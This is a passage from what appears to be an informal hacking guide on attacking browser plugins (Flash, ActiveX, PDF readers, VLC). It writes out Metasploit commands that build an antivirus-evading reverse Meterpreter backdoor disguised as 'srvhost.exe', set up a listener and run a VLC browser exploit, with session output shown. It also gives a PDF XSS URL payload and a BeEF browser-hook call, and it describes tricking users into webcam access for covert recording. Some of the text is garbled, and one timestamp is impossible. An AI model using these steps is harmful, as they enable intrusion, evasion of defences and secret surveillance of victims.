ActionScript 3 is also used with Adobe AIR system for the development of desktop and mobile applications. The language itself is open-source in that its specification is offered free of charge[3] and both an open source compiler (as part of Apache Flex) and open source virtual machine (Mozilla Tamarin) are available.
ActionScript is also used with Scaleform GFx for the development of 3D video game user interfaces and HUDs.
It is an open source scripting language that compiles into bytecode and is leveraged both in Adobe Flash and Apache Flex. These bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a similar sandbox environment to Java.
The ActionScript compiled bytecode is not human-readable, you can use tools like as SWFScan24 which reverse bytecode back into ActionScript. Most of the time applications contain hard-coded credentials, hidden URLs, and whatnot.
Flash with Webcam and Microphone Flash can access both the microphone and the webcam. The default security setting is set to deny access. If you want to check current setting just right-click a Flash applet and choose Settings, as shown
40 below:
Figure Display Adobe Flash Player webcam and microphone settings
If attacker fall user to enabling this feature, then, Flash applets can access the webcam and microphone. Moreover, if user clicks on Remember option, Flash will remember the setting for any Flash applets in the future within the context of the current origin.
Note: As this setting is not Flashapplet–specific, All the flash applet from the same site will be allowed. i.e. Trick someone into executing a Flash game that takes a picture with the webcam, and draws a funny frames on the picture. Once the victim allows an origin to access the camera and microphone, you can send a follow-up, hidden, 1x1 pixel Flash app that simply records their microphone and camera. You can also record audio using microphone. To send audio data over the Internet, the Microphone class is used in conjunction with the NetStream class. One of the most way was Clickjacking attacks via social engineering.
Fuzzing Flash Yes, Flash can be fuzzed to find an exploit. Security researchers have done this on numerous times in the past to discover various exploitable conditions. Best fuzzing exploit done by Google they cranked through 20 terabytes of SWF file downloads followed by 1 week of run time on 2,000 CPU cores to
41 calculate the minimal set of about 20,000 files. Finally, those same 2,000 cores plus three more weeks of runtime were put to good work mutating the files in the minimal set (bit flipping, etc.) and generating crash cases. These crash cases included an interesting range of vulnerability categories, including buffer overflows, integer overflows, use-after-frees and object type confusions.
ActiveX Controls ActiveX is a Microsoft plugin architecture for browsers that gives developers the ability to build additional functionality into the browser. ActiveX controls can also help developer for creating animations to installing software on a system. ActiveX controls are all time favorite for hacker’s for exploitation. Many online banking applications are required ActiveX controls to extend functionality from of the same. ActiveX is designed for Internet Explorer only; however, we have a plugin for Chrome and for Firefox as well which allow ActiveX to execute without having to open an Internet Explorer window. We have a limitation with these plugins. They are still required to be run under Windows because ActiveX is compiled code.
Exploiting ActiveX Controls Exploiting ActiveX is not an easy task at all; sometimes we have to combine more than two attacks to achieve access to more protected resources.
In below mentioned example, we will create a Metasploit payload, configure a handler, and create a fake page that we will send to victim. You can consider this as a phishing page and assuming that the ActiveX plugin is already installed on the target system.
The first step is to create and upload a Meterpreter payload that will send and executed by the victim. Let’s suppose this is your IP address is 192.168.1.11. Now, we need to set payload, port, and IP address to msfpayload to generate our Meterpreter backdoor. In addition, you can use msfencode to encode the binary to make it FUD (Fully undetectable) which less likely to be picked up by antivirus.
The following Metasploit command combines msfpayload and msfencode to create the binary: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.11\ LPORT=4444 R | msfencode -c 3 -t exe > Victimbackdoor.exe
The above-mentioned code creates a reverse Meterpreter payload that is encoded three times and saves the executable file as victimbackdoor.exe. Now, you need to configure Metasploit handler to allow the payload to connect back to you after exploit.
Now, to get reverse connection we need to start up msfconsole, multi/handler as mentioned below:
msf> use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.11 LHOST => 192.168.1.11
42 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.11:4444 [*] Starting the payload handler...
Now we have started our handler that is listening at this point, once user click on victimbackdoor.exe. it will launch the backdoor. The ActiveX control attempts to call Victimbackdoor.exe. To optimize your chances of success, you may want to name it something a little less obvious, such as “srvhost.exe,” after clicking the program calls home to your Metasploit listener. Metasploit will create a new session and allow you to interact with your new Meterpreter session:
msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.145 [*] Meterpreter session 7 opened (192.168.1.11:4444 -> 192.168.1.145:5557) at 2015-05-28 04:45:65 msf exploit(handler) > sessions -i 7 [*] Starting interaction with 7... meterpreter > sysinfo Computer : WIN-703KGJYKKN OS : Windows 7 (Build 7600). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter >
It is also possible to attack ActiveX directly like many other plugins. Vulnerabilities are found all the time in plugins, so it’s a matter of finding a suitable exploit for the target platform.
Attacking PDF Readers Acrobat and Foxit PDF reader are popular -- always favorite targets for malware writers. As PDFs have many features, many of them present rich landscapes for attack. PDF documents contain JavaScript, binary streams, etc.
Let’s talk in respect of how to detect PDF readers, how to leverage them for additional access, and how to exploit. Google Team has found many exploit in PDF files, which can be exploited using fuzzing. Team, Mateusz Jurczyk and Gynvael Coldwind were able to identify 50 bugs severity from low to high severity within Chrome’s PDF Reader. Using this data set to fuzz Adobe’s PDF Reader also identified at least an additional 25 critical vulnerabilities, many of which were subsequently patched but some are still unpatched.
43
Understand JavaScript in PDFs JavaScript can be used in PDFs, which is the cause of many of the PDF exploits. PDF files can include JavaScript that has access to the document as a whole. It’s similar to a browser DOM in that a PDF document has objects and methods as well. These methods can allow JavaScript events to fire on PDF elements. JavaScript feature always be recommended to turning off by security researcher and even adobe to prevent certain attacks. We should disable JavaScript in PDF prevent many of the common attacks.
Universal XSS in PDF ;) Universal XSS is code execution vulnerability. The Adobe Acrobat Reader Plugin is vulnerable to cross- site scripting (XSS), caused by improper validation of input passed to PDF documents. A remote attacker could exploit this vulnerability using a specially crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal or corrupt the victim's cookie-based authentication credentials or possibly obtain other sensitive information etc.
Using this vulnerability, an attacker might be successfully exploited which could lead to information disclosure or session hijacking.
How it’s works:
1. The attacker locates a PDF file hosted on httpsecure.com 2. Now, he create a specially crafted URL pointing to the PDF append with some JavaScript Malware payload in the fragment portion Example: http://httpsecure.org/path/to/file.pdf#s=Javascript:alert(”Universal xss”);) 3. The attacker entices a victim to click on the link. 4. If the victim has Adobe Acrobat Reader Plugin 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes successfully. 5. Post exploitation of XSS is capable of doing much critical attack including Phishing Intranet Hacking, Web Worms, History or cookie Stealing; etc.
Launching another Browser Another feature of PDFs is the capability to cause a browser to launch and request a specified URL. Using the app.launchURL method, you can force OS to launch the default browser. BeEF uses this functionality to hook the default browser from default browser. To exploit this we simply need to call the JavaScript code: app.launchURL("http://httpsecure.org:80",true);
Using above code, the PDF launches the URL that will be handled by the default browser. This will load a new hook granting you access to the new browser session as well. The Hook Default Browser module as
44 seen in below screenshot takes a hooked browser and sends it a PDF. The PDF in turn launches the URL back to the hook, then, browser will launches with the new hooked page.
Fig: Display “Hook Default Browser” module in BeEF
During this process, you may see some pop-up when executing this method, notifying you that an external window was launched. Be watch on BeEf whether the stoplight for the module is green or red, because some of the browser browsers react better to this technique than others.
Attacking on Media Plugins Some plugins such as VLC, RealPlayer, and Apple QuickTime are also vulnerable. These plugins are vulnerable to are called file format vulnerabilities. These are based on files that are malformed in some way that causes the browser plugin to overwrite pieces of memory, and execute malicious code. Media plugins can also detect in the same way as we did with other plugins. Some Plugins might support multiple MIME types for the various types of files that a single plugin may handle. Quick time player handles both .mp4 and .mov files, so there are two MIME types to reflect. Media plugins also frequently stream data from different servers, load additional files, and perform other speck task that may lead to
45 vulnerabilities. Let’s have a look at how to enumerate files with VLC, and execute file format exploits through Metasploit against vulnerable plugins.
Exploiting Media Players Plugin with Metasploit This module exploits a buffer overflow in the VLC media player version prior to 2.0.0. The vulnerability is due to a dangerous use of sprintf that can result in a stack buffer overflow when handling a malicious MMS URI. This module uses the browser as attack vector. A specially crafted MMS URI is used to trigger the overflow and get flow control through SEH overwrite. Control is transferred to code located in the heap through a standard heap spray. The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
Let’s execute the following with Metasploit:
msf> use exploit/windows/browser/vlc_mms_bof msf exploit(vlc_mms_bof) > set URIPATH /vlc URIPATH => /vlc msf exploit(vlc_mms_bof) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(vlc_mms_bof) > set LHOST 192.168.1.11 LHOST => 192.168.1.11 msf exploit(vlc_mms_bof) > set LPORT 4444 LPORT => 4444 msf exploit(vlc_mms_bof) > exploit [*] Exploit running as background job.
46
[*] Started reverse handler on 192.168.1.11:4444 [*] Using URL: http://0.0.0.0:80/vlc [*] Local IP: http://192.168.1.11:80/vlc [*] Server started.
Once the server is started, it will send the browser to your Metasploit exploit. For example, it is http://192.168.1.11:80/vlc. The browser will take some time and then show a black box where the media should be playing, as mentioned below. Once the user sees this, you should already have a shell waiting inside Metasploit.
Fig Display The browser window as it will appear only after exploit is successful run
In the above example, The Meterpreter payload automatically migrates into a new process. Once the exploit has succeeded, the browser will be unstable. In this situation, the new process will help make sure that the Meterpreter payload remains longer than a few moments. The Metasploit console will display:
47
[*] 192.168.1.29 vlc_mms_bof - Sending malicious page [*] Sending stage (752128 bytes) to 192.168.1.29 [*] Meterpreter session 3 opened (192.168.1.11:4444 -> 192.168.1.29:1654) at 2015-05-29 05:23:36 -0200 [*] Session ID 2 (192.168.1.11:4444 -> 192.168.1.29:1654) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2000) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2308 [+] Successfully migrated to process msf exploit(vlc_mms_bof) > sessions -i 3 [*] Starting interaction with 3... meterpreter > sysinfo Computer : VM-1 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter :
The browser might not crash immediately, so it may not even be clear that the malicious page was the source of the crash. This can also be used to inject into advertisement blocks, drive-by downloads, and phishing attacks etc. The attacker already has a shell by the time the user realizes that something is amiss.
Don’t look videos that load the same way or will you ? hahahahahaha!!!!
All the best with hacking
Some Useful links https://www.mozilla.org/en-US/plugincheck/ http://www.pinlady.net/PluginDetect/guide/ http://beefproject.com/
Reference https://browserhacker.com/ http://en.wikipedia.org/wiki/Plug-in_(computing) http://en.wikipedia.org/wiki/Browser_extension http://en.wikipedia.org/wiki/BeEF
48 http://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web- browser/ http://en.wikipedia.org/wiki/Java_applet
49